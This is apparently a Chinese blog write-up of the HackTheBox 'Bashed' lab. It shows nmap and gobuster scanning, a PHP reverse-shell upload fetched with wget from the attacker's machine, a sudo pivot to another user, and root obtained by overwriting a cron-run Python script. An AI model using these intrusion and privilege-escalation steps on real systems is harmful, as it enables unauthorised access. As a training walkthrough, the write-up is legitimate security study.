开始,第一步
一、信息搜集
nmap扫描:nmap -sV -v 10.10.10.68
只发现了一个80端口,是Apache2.4.18版本
nmap再扫描一下看下有什么漏洞:nmap --script=vuln -p 80 -v 10.10.10.68
看到有个DOS的漏洞,不好利用,看到有目录枚举,我们浏览器打开看一看
使用gobuster扫描一下:gobuster dir --url http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
这几个目录都进去看看,发现有dev下面有个可以连接bash的php文件
二、入侵
这个shell不是root权限,而且在网页上也不好操作,我们得想办法反弹shell到kali终端上
既然这里能执行php的脚本,我们看看能不能上传上去一个php的webshell得到一个反向shell
看到这里有一个目录名称是uploads,我们上传到这个目录上试试
kali有自带的php脚本,默认是在/usr/share/webshell下面,我们移动到桌面修改一下IP和端口
使用python开启一个http服务:python3 -m http.server 80
在webshell上下载:wget http://10.10.16.4/p.php
在kali上开启监听,访问这个p.php文件
可以看到成功反弹shell至kali终端,提升至一个半交互式的shell:python -c 'import pty; pty.spawn("/bin/bash")'
已经得到一个用户权限的shell了,接下来就是提权了, sudo -l看一下
发现有一个scriptmanager用户可以使用所有的权限,使用这个用户使用bash:sudo -u scriptmanager /bin/bash
ls -al看一下
有一个scripts目录比较特殊,是该用户和该用户组的,进去看看
发现一个脚本和一个txt文件,这个python脚本看看内容是什么
这是一个写文件的测试脚本,生成了一个test.txt文件,可以注意到test.txt文件是root权限的,而且看时间也是今天,很可能是root定时执行这个脚本生成了这个文件,所以我们把这个脚本内容改成python反弹shell的脚本
根据脚本命令,kali开启一个5555端口的监听,等待一会儿,成功反弹shell
可以看到是root权限,接下来就是find flag了
提交,完工!
标签:脚本,shell,HTB,python,Writeup,Bashed,kali,php,bash From: https://www.cnblogs.com/chengwenjun/p/16600111.html